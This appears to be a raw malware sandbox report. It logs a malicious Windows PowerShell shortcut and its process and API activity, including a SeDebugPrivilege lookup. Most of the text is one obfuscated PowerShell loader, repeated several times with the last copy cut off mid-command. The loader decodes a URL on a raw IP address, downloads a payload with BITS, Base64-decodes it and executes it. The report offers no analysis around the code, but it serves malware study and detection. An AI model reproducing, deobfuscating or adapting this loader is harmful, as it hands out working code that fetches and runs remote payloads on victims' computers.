file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
cmdline POWERSHELL "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
wmi select * from win32_process where ProcessId=2196
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: POWERSHELL
parameters: "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
filepath: POWERSHELL
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
cmdline POWERSHELL "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 